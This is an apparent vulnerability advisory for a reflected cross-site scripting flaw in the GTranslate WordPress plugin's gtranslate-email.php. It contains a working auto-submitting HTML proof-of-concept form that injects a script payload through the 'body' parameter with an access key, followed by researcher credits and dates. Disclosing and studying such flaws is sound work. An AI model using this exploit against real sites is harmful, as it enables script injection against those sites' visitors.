The plugin does not sanitise and escape the body parameter in the url_addon/gtranslate-email.php file before outputting it back in the page, leading to a Reflected Cross-Site Scripting issue. Note: exploitation of the issue requires knowledge of the NONCE_SALT and NONCE_KEY
<html> <body> <form action="https://example.com/wp-content/plugins/gtranslate/url_addon/gtranslate-email.php?glang=e1n" id="hack" method="POST"> <input type="hidden" name="body" value="<script>alert(/XSS/)</script>" /> <input type="hidden" name="access_key" value="b4a0efbacac60a7d20cb891f5d656a3f" /> <input type="submit" value="Submit request" /> </form> </body> <script> var form1 = document.getElementById('hack'); form1.submit(); </script> </html>
ZhongFu Su(JrXnm) of Wuhan University
ZhongFu Su(JrXnm) of Wuhan University
Yes
2022-01-10 (about 1 years ago)
2022-01-10 (about 1 years ago)
2022-09-26 (about 8 months ago)